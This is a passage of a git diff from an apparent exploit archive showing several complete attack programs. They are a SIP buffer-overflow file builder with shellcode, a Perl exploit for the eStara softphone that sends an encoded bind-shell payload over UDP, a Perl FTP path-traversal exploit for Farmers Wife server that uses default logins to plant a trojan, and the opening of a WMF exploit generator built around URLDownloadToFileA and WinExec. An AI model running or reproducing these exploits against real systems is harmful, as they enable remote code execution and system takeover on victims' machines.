+	0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 
+	0x39, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x31, 0x32, 0x33, 0x34, 
+	0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 
+	0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x3A, 0x30, 0x20, 0x50, 0x43, 0x4D, 0x55, 0x2F, 
+	0x38, 0x30, 0x30, 0x30, 0x0D, 0x0A
+};
+
+
+
+unsigned char scode[] =
+"\xB8"
+"\x75\xC1\xe4\x88" //Address of MessageBoxA + 0x11111111
+"\x2D\x11\x11\x11\x11\x50\x59\x33\xc0\x50\x68"
+"\x68\x61\x63\x6b"	//"hack"
+"\x54\x5a\x50\x52\x52\x50\x53\x51\xc3";
+
+//Shellcode:
+//B8 75C1e488 MOV EAX,88e4C175 ; MessageBoxA + 0x11111111 to
+//2D 11111111 SUB EAX,11111111 ; Make characters readable
+//50 PUSH EAX ; xchg registers : eax = 77D3b064
+//59 POP ECX ; Offset to API.
+//33C0 XOR EAX,EAX ; Create Null
+//50 PUSH EAX ; Put ascii0 end of string
+//68 6861636b PUSH 6b636168 ; Create string.= hack
+//54 PUSH ESP ; Get the offset to the 
+//5A POP EDX ; Message String
+//MessageBox call
+//50 PUSH EAX ; Null Pointer
+//52 PUSH EAX ; Message
+//52 PUSH EDX ; Message
+//50 PUSH EAX ; Null Pointer
+//53 PUSH EBX ; Return address: 0x00000000
+//51 PUSH ECX ; Address of MessageBoxA
+//C3 RETN ; Jump 
+
+
+int main()
+{
+	FILE *stream;
+	unsigned char *exploitbuf;
+	int size;
+	char *filename = "sip_overbuf_exploit.dat";
+	DWORD msgboxaddr = (DWORD)MessageBoxA; //Windows XP EN SP2 MessageBoxA address = 0x77d6e824;
+											//If others, just change it;
+
+	size = sizeof(invite)+sizeof(jmpesp)+sizeof(end);
+	exploitbuf = (unsigned char *)malloc(size);
+	printf("exploitbuf len = %d\n", size);
+	memcpy(exploitbuf, invite, sizeof(invite));
+	memcpy(exploitbuf+sizeof(invite), jmpesp, sizeof(jmpesp));
+	memcpy(exploitbuf+sizeof(invite)+sizeof(jmpesp), end, sizeof(end));
+	*(DWORD *)&scode[1] = msgboxaddr+0x11111111;
+	memcpy(exploitbuf+sizeof(invite)+sizeof(jmpesp), scode, sizeof(scode));
+	
+
+	if( (stream = fopen( filename, "w+b" )) == NULL )
+		printf("Build File Error!!!\n");	
+	else
+		printf("Build File %s successful! ^_^\n", filename);
+
+	free(exploitbuf);
+	fwrite( exploitbuf, size, 1, stream );
+	fclose(stream);
+}
+
+// milw0rm.com [2006-01-12]
diff --git a/platforms/windows/remote/1414.pl b/platforms/windows/remote/1414.pl
index bfd02f033..a1f8e7925 100755
--- a/platforms/windows/remote/1414.pl
+++ b/platforms/windows/remote/1414.pl
@@ -1,93 +1,93 @@
-#!/usr/bin/perl -s
-# damn-hippie.pl by kokanin (google estara, it shows sip stuff and a hippie)
-# Remote "estara softphone" exploit, executable version info = 3.0.1.2
-# kokanin did the research, metasploit.com did the encoded bindshell on tcp/5060
-# Lets face it, most users wont know the difference between tcp and udp even if 
-# if it bites them in the ass, so the port is chosen in the hope that nat'ed
-# users forward both tcp and udp port 5060 to their machine to make sip stuff
-# work without all that hard thinking taking place.
-
-# this used to be 0day, but I saw someone release something called estara.c
-# on packetstorm today. I don't know if it's even the same bug, but this
-# exploit is better anyway, so there.
-
-# win32_bind, \x00\x0a\x0d encoded, [ EXITFUNC=thread LPORT=5060 Size=399 ] 
-# again, provided by http://metasploit.com (facing more stuff, I wouldn't know
-# how to write win32 shellcode even if someone bit me in the ass :)
-# since the shellcode exits the thread the user should not notice anything.
-
-use IO::Socket;
-if(!$ARGV[0])
-{ print "I am private, do not use me. Tell kokanin how you got me\n"; exit(-1); }
-my $ret = pack("l",0x0303DCDF); # jmp di in softphone.exe, seems stable
-my $buflen = 4099;
-
-my $shellcode =
-"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x08\xb3".
-"\x06\x82\x83\xeb\xfc\xe2\xf4\xf4\x5b\x50\x82\x08\xb3\x55\xd7\x5e".
-"\xe4\x8d\xee\x2c\xab\x8d\xc7\x34\x38\x52\x87\x70\xb2\xec\x09\x42".
-"\xab\x8d\xd8\x28\xb2\xed\x61\x3a\xfa\x8d\xb6\x83\xb2\xe8\xb3\xf7".
-"\x4f\x37\x42\xa4\x8b\xe6\xf6\x0f\x72\xc9\x8f\x09\x74\xed\x70\x33".
-"\xcf\x22\x96\x7d\x52\x8d\xd8\x2c\xb2\xed\xe4\x83\xbf\x4d\x09\x52".
-"\xaf\x07\x69\x83\xb7\x8d\x83\xe0\x58\x04\xb3\xc8\xec\x58\xdf\x53".
-"\x71\x0e\x82\x56\xd9\x36\xdb\x6c\x38\x1f\x09\x53\xbf\x8d\xd9\x14".
-"\x38\x1d\x09\x53\xbb\x55\xea\x86\xfd\x08\x6e\xf7\x65\x8f\x45\x89".
-"\x5f\x06\x83\x08\xb3\x51\xd4\x5b\x3a\xe3\x6a\x2f\xb3\x06\x82\x98".
-"\xb2\x06\x82\xbe\xaa\x1e\x65\xac\xaa\x76\x6b\xed\xfa\x80\xcb\xac".
-"\xa9\x76\x45\xac\x1e\x28\x6b\xd1\xba\xf3\x2f\xc3\x5e\xfa\xb9\x5f".
-"\xe0\x34\xdd\x3b\x81\x06\xd9\x85\xf8\x26\xd3\xf7\x64\x8f\x5d\x81".
-"\x70\x8b\xf7\x1c\xd9\x01\xdb\x59\xe0\xf9\xb6\x87\x4c\x53\x86\x51".
-"\x3a\x02\x0c\xea\x41\x2d\xa5\x5c\x4c\x31\x7d\x5d\x83\x37\x42\x58".
-"\xe3\x56\xd2\x48\xe3\x46\xd2\xf7\xe6\x2a\x0b\xcf\x82\xdd\xd1\x5b".
-"\xdb\x04\x82\x1b\x77\x8f\x62\x62\xa3\x56\xd5\xf7\xe6\x22\xd1\x5f".
-"\x4c\x53\xaa\x5b\xe7\x51\x7d\x5d\x93\x8f\x45\x60\xf0\x4b\xc6\x08".
-"\x3a\xe5\x05\xf2\x82\xc6\x0f\x74\x97\xaa\xe8\x1d\xea\xf5\x29\x8f".
-"\x49\x85\x6e\x5c\x75\x42\xa6\x18\xf7\x60\x45\x4c\x97\x3a\x83\x09".
-"\x3a\x7a\xa6\x40\x3a\x7a\xa6\x44\x3a\x7a\xa6\x58\x3e\x42\xa6\x18".
-"\xe7\x56\xd3\x59\xe2\x47\xd3\x41\xe2\x57\xd1\x59\x4c\x73\x82\x60".
-"\xc1\xf8\x31\x1e\x4c\x53\x86\xf7\x63\x8f\x64\xf7\xc6\x06\xea\xa5".
-"\x6a\x03\x4c\xf7\xe6\x02\x0b\xcb\xd9\xf9\x7d\x3e\x4c\xd5\x7d\x7d".
-"\xb3\x6e\x6d\xc6\x53\x66\x7d\x5d\xb7\x37\x59\x5b\x4c\xd6\x82";
-
-my $buffer = "\x90" x ($buflen - length($shellcode)) . $shellcode;
-
-my $sipinvite = 
-
-"INVITE sip:snotboble\@solgryn.fi.st SIP/2.0\r\n".
-"Via: SIP/2.0/UDP abcdabcd.fi.st:1234;branch=somebranchidhere\r\n".
-"From: 2448 ;tag=2448\r\n".
-"To: Receiver \r\n".
-"Call-ID: 0\@abcdabcd.fi.st\r\n".
-"CSeq: 1 INVITE\r\n".
-"Contact: 2448 \r\n".
-"Expires: 1200\r\n".
-"Max-Forwards: 70\r\n".
-"Content-Type: application/sdp\r\n".
-"Content-Length: 4234\r\n".
-"\r\n".
-$buffer . 
-"=0\r\n".
-"o=2448 2448 2448 IN IP4 " . $ret . "DCBA.fi.st\r\n".
-"s=Session SDP\r\n".
-"c=IN IP4 123.123.12.34\r\n".
-"t=0 0\r\n".
-"m=audio 9876 RTP/AVP 0\r\n".
-"a=rtpmap:0 PCMU/8000\r\n".
-"\r\n";
-$host = $ARGV[0];
-$port = 5060;
-
-$socket = new IO::Socket::INET
-(
-Proto    => "udp",
-PeerAddr => $host,
-PeerPort => $port,
-);
-
-die "unable to connect to $host:$port ($!)\n" unless $socket;
-
-print $socket $sipinvite; 
-
-close($socket);
-
-# milw0rm.com [2006-01-12]
+#!/usr/bin/perl -s
+# damn-hippie.pl by kokanin (google estara, it shows sip stuff and a hippie)
+# Remote "estara softphone" exploit, executable version info = 3.0.1.2
+# kokanin did the research, metasploit.com did the encoded bindshell on tcp/5060
+# Lets face it, most users wont know the difference between tcp and udp even if 
+# if it bites them in the ass, so the port is chosen in the hope that nat'ed
+# users forward both tcp and udp port 5060 to their machine to make sip stuff
+# work without all that hard thinking taking place.
+
+# this used to be 0day, but I saw someone release something called estara.c
+# on packetstorm today. I don't know if it's even the same bug, but this
+# exploit is better anyway, so there.
+
+# win32_bind, \x00\x0a\x0d encoded, [ EXITFUNC=thread LPORT=5060 Size=399 ] 
+# again, provided by http://metasploit.com (facing more stuff, I wouldn't know
+# how to write win32 shellcode even if someone bit me in the ass :)
+# since the shellcode exits the thread the user should not notice anything.
+
+use IO::Socket;
+if(!$ARGV[0])
+{ print "I am private, do not use me. Tell kokanin how you got me\n"; exit(-1); }
+my $ret = pack("l",0x0303DCDF); # jmp di in softphone.exe, seems stable
+my $buflen = 4099;
+
+my $shellcode =
+"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x08\xb3".
+"\x06\x82\x83\xeb\xfc\xe2\xf4\xf4\x5b\x50\x82\x08\xb3\x55\xd7\x5e".
+"\xe4\x8d\xee\x2c\xab\x8d\xc7\x34\x38\x52\x87\x70\xb2\xec\x09\x42".
+"\xab\x8d\xd8\x28\xb2\xed\x61\x3a\xfa\x8d\xb6\x83\xb2\xe8\xb3\xf7".
+"\x4f\x37\x42\xa4\x8b\xe6\xf6\x0f\x72\xc9\x8f\x09\x74\xed\x70\x33".
+"\xcf\x22\x96\x7d\x52\x8d\xd8\x2c\xb2\xed\xe4\x83\xbf\x4d\x09\x52".
+"\xaf\x07\x69\x83\xb7\x8d\x83\xe0\x58\x04\xb3\xc8\xec\x58\xdf\x53".
+"\x71\x0e\x82\x56\xd9\x36\xdb\x6c\x38\x1f\x09\x53\xbf\x8d\xd9\x14".
+"\x38\x1d\x09\x53\xbb\x55\xea\x86\xfd\x08\x6e\xf7\x65\x8f\x45\x89".
+"\x5f\x06\x83\x08\xb3\x51\xd4\x5b\x3a\xe3\x6a\x2f\xb3\x06\x82\x98".
+"\xb2\x06\x82\xbe\xaa\x1e\x65\xac\xaa\x76\x6b\xed\xfa\x80\xcb\xac".
+"\xa9\x76\x45\xac\x1e\x28\x6b\xd1\xba\xf3\x2f\xc3\x5e\xfa\xb9\x5f".
+"\xe0\x34\xdd\x3b\x81\x06\xd9\x85\xf8\x26\xd3\xf7\x64\x8f\x5d\x81".
+"\x70\x8b\xf7\x1c\xd9\x01\xdb\x59\xe0\xf9\xb6\x87\x4c\x53\x86\x51".
+"\x3a\x02\x0c\xea\x41\x2d\xa5\x5c\x4c\x31\x7d\x5d\x83\x37\x42\x58".
+"\xe3\x56\xd2\x48\xe3\x46\xd2\xf7\xe6\x2a\x0b\xcf\x82\xdd\xd1\x5b".
+"\xdb\x04\x82\x1b\x77\x8f\x62\x62\xa3\x56\xd5\xf7\xe6\x22\xd1\x5f".
+"\x4c\x53\xaa\x5b\xe7\x51\x7d\x5d\x93\x8f\x45\x60\xf0\x4b\xc6\x08".
+"\x3a\xe5\x05\xf2\x82\xc6\x0f\x74\x97\xaa\xe8\x1d\xea\xf5\x29\x8f".
+"\x49\x85\x6e\x5c\x75\x42\xa6\x18\xf7\x60\x45\x4c\x97\x3a\x83\x09".
+"\x3a\x7a\xa6\x40\x3a\x7a\xa6\x44\x3a\x7a\xa6\x58\x3e\x42\xa6\x18".
+"\xe7\x56\xd3\x59\xe2\x47\xd3\x41\xe2\x57\xd1\x59\x4c\x73\x82\x60".
+"\xc1\xf8\x31\x1e\x4c\x53\x86\xf7\x63\x8f\x64\xf7\xc6\x06\xea\xa5".
+"\x6a\x03\x4c\xf7\xe6\x02\x0b\xcb\xd9\xf9\x7d\x3e\x4c\xd5\x7d\x7d".
+"\xb3\x6e\x6d\xc6\x53\x66\x7d\x5d\xb7\x37\x59\x5b\x4c\xd6\x82";
+
+my $buffer = "\x90" x ($buflen - length($shellcode)) . $shellcode;
+
+my $sipinvite = 
+
+"INVITE sip:snotboble\@solgryn.fi.st SIP/2.0\r\n".
+"Via: SIP/2.0/UDP abcdabcd.fi.st:1234;branch=somebranchidhere\r\n".
+"From: 2448 ;tag=2448\r\n".
+"To: Receiver \r\n".
+"Call-ID: 0\@abcdabcd.fi.st\r\n".
+"CSeq: 1 INVITE\r\n".
+"Contact: 2448 \r\n".
+"Expires: 1200\r\n".
+"Max-Forwards: 70\r\n".
+"Content-Type: application/sdp\r\n".
+"Content-Length: 4234\r\n".
+"\r\n".
+$buffer . 
+"=0\r\n".
+"o=2448 2448 2448 IN IP4 " . $ret . "DCBA.fi.st\r\n".
+"s=Session SDP\r\n".
+"c=IN IP4 123.123.12.34\r\n".
+"t=0 0\r\n".
+"m=audio 9876 RTP/AVP 0\r\n".
+"a=rtpmap:0 PCMU/8000\r\n".
+"\r\n";
+$host = $ARGV[0];
+$port = 5060;
+
+$socket = new IO::Socket::INET
+(
+Proto    => "udp",
+PeerAddr => $host,
+PeerPort => $port,
+);
+
+die "unable to connect to $host:$port ($!)\n" unless $socket;
+
+print $socket $sipinvite; 
+
+close($socket);
+
+# milw0rm.com [2006-01-12]
diff --git a/platforms/windows/remote/1417.pl b/platforms/windows/remote/1417.pl
index 6577200f2..bbc901509 100755
--- a/platforms/windows/remote/1417.pl
+++ b/platforms/windows/remote/1417.pl
@@ -1,56 +1,56 @@
-#!/usr/bin/perl
-# kokanin 20060106 // farmers wife server 4.4 sp1 allows us to 
-# use ../../../ patterns as long as we stand in a folder where we have write access.
-# haha, that's what you get for implementing your own access control instead of relying on the underlying OS.
-# default port is 22003, default writable path is /guests.
-
-# 0day 0day, private, distribute and die bla bla bla
-# leet (translated) note from : you can log in as IEUser/mail@mail.com or anonymous/mail@mail.com
-# on _all_ farmers wife servers. This can't be disabled unless you turn off FTP access. The anonymous
-# login gives you guest access, which means write access to /guests, which means default remote 'root'
-# aka SYSTEM access. Ha ha ha, thanks anonymized, I missed that bit.
-
-
-if(!$ARGV[0]){ die "Usage: ./thisscript.pl  [user] [pass] [port] [path] [trojan.exe] [/path/to/target.exe] \n";}
-# as in: ./thisscript.pl 123.45.67.89 demo demo 22003 /writablepath /etc/hosts /owned.txt
-# by default we just put /etc/hosts in a file called owned.txt in the root of the drive - 
-# nuke %SYSTEMROOT%\system32\at.exe and wait for windows to run it.
-
-# We can check for the %SYSTEMROOT% with the SIZE command to determine the proper
-# location for our trojan.
-
-use Net::FTP;
-my $target = $ARGV[0];
-my $dotdot = "../../../../../../../../../../../../../../";
-# Here we set defaults (It's ugly, I know) that gives REMOTE REWT OMGOMG I MEAN SYSTEM
-if($ARGV[1]){ $user = $ARGV[1] } else { $user = "IEUser";}
-if($ARGV[2]){ $pass = $ARGV[2] } else { $pass = "mail\@mail.com";}
-if($ARGV[3]){ $port = $ARGV[3] } else { $port = "22003";}
-if($ARGV[4]){ $writablepath = $ARGV[4] } else { $writablepath = "/guests";}
-if($ARGV[5]){ $trojan = $ARGV[5] } else { $trojan = "/etc/hosts";}
-if($ARGV[6]){ $destination = $ARGV[6] } else { $destination = "owned.txt";}
-print " target: $target \n user: $user \n pass: $pass \n port: $port \n writable path: $writablepath \n trojan: $trojan \n targetfile: $destination \n";
-
-# Open the command socket
-use Net::FTP;
-$ftp = Net::FTP->new("$target",
-                      Debug => 0,
-                      Port => "$port")
-	or die "Cannot connect: $@";
-	$ftp->login("$user","$pass")
-	or die "Cannot login ", $ftp->message;
-	$ftp->cwd("$writablepath")
-	# this software is so shitty, it allows us to CWD to any folder and just pukes later if it's not there.
-	or die "Cannot go to writable dir ", $ftp->message;
-	# leet %SYSTEMROOT% scan by determining where at.exe is using SIZE
-	my @systemroots = ("PUNIX","WINXP","WINNT","WIN2000","WIN2K","WINDOWS","WINDOZE");
-	for(@systemroots){
-		$reply = $ftp->quot("SIZE " . $dotdot . $_ . "/system32/at.exe");
-		if($reply == 2) { print " %SYSTEMROOT% is /$_\n";my $systemroot=$_; }
-		}
-	$ftp->binary;
-	$ftp->put("$trojan","$dotdot"."$destination")
-	and print "file successfully uploaded, donate money to kokanin\@gmail.com\n" or die "Something messed up, file upload failed ", $ftp->message;
-$ftp->quit;
-
-# milw0rm.com [2006-01-14]
+#!/usr/bin/perl
+# kokanin 20060106 // farmers wife server 4.4 sp1 allows us to 
+# use ../../../ patterns as long as we stand in a folder where we have write access.
+# haha, that's what you get for implementing your own access control instead of relying on the underlying OS.
+# default port is 22003, default writable path is /guests.
+
+# 0day 0day, private, distribute and die bla bla bla
+# leet (translated) note from : you can log in as IEUser/mail@mail.com or anonymous/mail@mail.com
+# on _all_ farmers wife servers. This can't be disabled unless you turn off FTP access. The anonymous
+# login gives you guest access, which means write access to /guests, which means default remote 'root'
+# aka SYSTEM access. Ha ha ha, thanks anonymized, I missed that bit.
+
+
+if(!$ARGV[0]){ die "Usage: ./thisscript.pl  [user] [pass] [port] [path] [trojan.exe] [/path/to/target.exe] \n";}
+# as in: ./thisscript.pl 123.45.67.89 demo demo 22003 /writablepath /etc/hosts /owned.txt
+# by default we just put /etc/hosts in a file called owned.txt in the root of the drive - 
+# nuke %SYSTEMROOT%\system32\at.exe and wait for windows to run it.
+
+# We can check for the %SYSTEMROOT% with the SIZE command to determine the proper
+# location for our trojan.
+
+use Net::FTP;
+my $target = $ARGV[0];
+my $dotdot = "../../../../../../../../../../../../../../";
+# Here we set defaults (It's ugly, I know) that gives REMOTE REWT OMGOMG I MEAN SYSTEM
+if($ARGV[1]){ $user = $ARGV[1] } else { $user = "IEUser";}
+if($ARGV[2]){ $pass = $ARGV[2] } else { $pass = "mail\@mail.com";}
+if($ARGV[3]){ $port = $ARGV[3] } else { $port = "22003";}
+if($ARGV[4]){ $writablepath = $ARGV[4] } else { $writablepath = "/guests";}
+if($ARGV[5]){ $trojan = $ARGV[5] } else { $trojan = "/etc/hosts";}
+if($ARGV[6]){ $destination = $ARGV[6] } else { $destination = "owned.txt";}
+print " target: $target \n user: $user \n pass: $pass \n port: $port \n writable path: $writablepath \n trojan: $trojan \n targetfile: $destination \n";
+
+# Open the command socket
+use Net::FTP;
+$ftp = Net::FTP->new("$target",
+                      Debug => 0,
+                      Port => "$port")
+	or die "Cannot connect: $@";
+	$ftp->login("$user","$pass")
+	or die "Cannot login ", $ftp->message;
+	$ftp->cwd("$writablepath")
+	# this software is so shitty, it allows us to CWD to any folder and just pukes later if it's not there.
+	or die "Cannot go to writable dir ", $ftp->message;
+	# leet %SYSTEMROOT% scan by determining where at.exe is using SIZE
+	my @systemroots = ("PUNIX","WINXP","WINNT","WIN2000","WIN2K","WINDOWS","WINDOZE");
+	for(@systemroots){
+		$reply = $ftp->quot("SIZE " . $dotdot . $_ . "/system32/at.exe");
+		if($reply == 2) { print " %SYSTEMROOT% is /$_\n";my $systemroot=$_; }
+		}
+	$ftp->binary;
+	$ftp->put("$trojan","$dotdot"."$destination")
+	and print "file successfully uploaded, donate money to kokanin\@gmail.com\n" or die "Something messed up, file upload failed ", $ftp->message;
+$ftp->quit;
+
+# milw0rm.com [2006-01-14]
diff --git a/platforms/windows/remote/1420.c b/platforms/windows/remote/1420.c
index 38ee0a76e..b529cb4b9 100755
--- a/platforms/windows/remote/1420.c
+++ b/platforms/windows/remote/1420.c
@@ -1,1399 +1,1399 @@
-/*
-\
-/		WMF nDay download() Exploit Generator
-\		       by Unl0ck Research Team
-/
-\
-/     greetz: 
-			rst/ghc { ed, uf0, fost },
-			uKt { choix, nekd0, payhash, antq }, 
-			blacksecurity { #black } , 
-			0x557 { kaka, swan, sam, nolife }, 
-			sowhat, tty64 { izik };
-
-	This sploit is now full shit, so... 
-	kiddies party has been started!!!
-
-urs, 
-darkeagle
-\
-/
-*/
-
-#include 
-#include 
-
-#pragma comment(lib, "ws2_32")
-
-// Use for find the ASM code
-#define PROC_BEGIN                    __asm _emit 0x90 __asm  _emit 0x90\
-                                      __asm _emit 0x90 __asm  _emit 0x90\
-                                      __asm _emit 0x90 __asm  _emit 0x90\
-                                      __asm _emit 0x90 __asm  _emit 0x90
-#define PROC_END                       PROC_BEGIN
-#define SEARCH_STR                     "\x90\x90\x90\x90\x90\x90\x90\x90\x90"
-#define SEARCH_LEN                     8
-#define MAX_SC_LEN                     2048
-#define HASH_KEY                       13
-
-// Define Decode Parameter
-#define DECODE_LEN                     21
-#define SC_LEN_OFFSET                  7
-#define ENC_KEY_OFFSET                 11
-#define ENC_KEY                        0xff
-
-
-// Define Function Addr
-#define ADDR_LoadLibraryA              [esi]
-#define ADDR_GetSystemDirectoryA       [esi+4]
-#define ADDR_WinExec                   [esi+8]
-#define ADDR_ExitProcess               [esi+12]
-#define ADDR_URLDownloadToFileA        [esi+16]
-
-// Need functions
-unsigned char functions[100][128] =
-{                                           // [esi] stack layout
-   // kernel32 4                           // 00 kernel32.dll
-   {"LoadLibraryA"},                       //    [esi]
-   {"GetSystemDirectoryA"},                //    [esi+4]
-   {"WinExec"},                            //    [esi+8]
-   {"ExitProcess"},                        //    [esi+12]
-   // urlmon  1                            // 01 urlmon.dll
-   {"URLDownloadToFileA"},                 //    [esi+16]
-   {""},
-};
-
-
-
-unsigned char head1[512] = {
-	0x01, 0x00, 0x09, 0x00, 0x00, 0x03, 0x52, 0x1F, 0x00, 0x00, 0x06, 0x00, 0x3D, 0x00, 0x00, 0x00,
-	0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x18, 0x00, 0xFF, 0xFF, 0xFF, 0xFF,
-	0xFF, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x03, 0x85, 0x00,
-	0xD0, 0x02, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x08, 0x00, 0xFF, 0xFF,
-	0xFF, 0xFF, 0x02, 0x00, 0x00, 0x00, 0x17, 0x00, 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x23, 0x00,
-	0xFF, 0xFF, 0xFF, 0xFF, 0x04, 0x00, 0x1B, 0x00, 0x54, 0x4E, 0x50, 0x50, 0x14, 0x00, 0x20, 0x00,
-	0xB8, 0x00, 0x32, 0x06, 0x00, 0x00, 0xFF, 0xFF, 0x4F, 0x00, 0x14, 0x00, 0x00, 0x00, 0x4D, 0x00,
-	0x69, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x0A, 0x00, 0x54, 0x4E,
-	0x50, 0x50, 0x00, 0x00, 0x02, 0x00, 0xF4, 0x03, 0x09, 0x00, 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00,
-	0x08, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x03, 0x00, 0x00, 0x00, 0x0F, 0x00, 0x00, 0x00, 0x26, 0x06,
-	0x0F, 0x00, 0x14, 0x00, 0x54, 0x4E, 0x50, 0x50, 0x04, 0x00, 0x0C, 0x00, 0x01, 0x00, 0x00, 0x00,
-	0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x0B, 0x02, 0x00, 0x00,
-	0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x0C, 0x02, 0xD0, 0x02, 0xC0, 0x03, 0x04, 0x00, 0x00, 0x00,
-	0x04, 0x01, 0x0D, 0x00, 0x07, 0x00, 0x00, 0x00, 0xFC, 0x02, 0x00, 0x00, 0x00, 0x00, 0x66, 0x00,
-	0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0xFA, 0x02,
-	0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0x00, 0x22, 0x00, 0x04, 0x00, 0x00, 0x00,
-	0x2D, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00,
-	0x1D, 0x06, 0x21, 0x00, 0xF0, 0x00, 0xD0, 0x02, 0xC0, 0x03, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
-	0x00, 0x00, 0x2D, 0x01, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0xFC, 0x02, 0x00, 0x00, 0xFF, 0xFF,
-	0xFF, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x02, 0x00, 0x04, 0x00, 0x00, 0x00,
-	0xF0, 0x01, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0xFA, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-	0x00, 0x00, 0x00, 0x00, 0x22, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x00, 0x00, 0x10, 0x00,
-	0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x16, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x47, 0x00,
-	0x00, 0x00, 0x8F, 0x02, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0xC1, 0x02, 0x00, 0x00, 0x08, 0x00,
-	0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x06, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x01, 0x00, 0x0D, 0x00,
-	0x00, 0x00, 0xFB, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-	0x00, 0x01, 0x17, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x03, 0x00,
-	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0x00, 0x00, 0x00, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
-	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x10, 0x00, 0x00, 0x00,
-	0x26, 0x06, 0x09, 0x00, 0x16, 0x00, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90
-};
-
-unsigned char head2[15220] = {
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
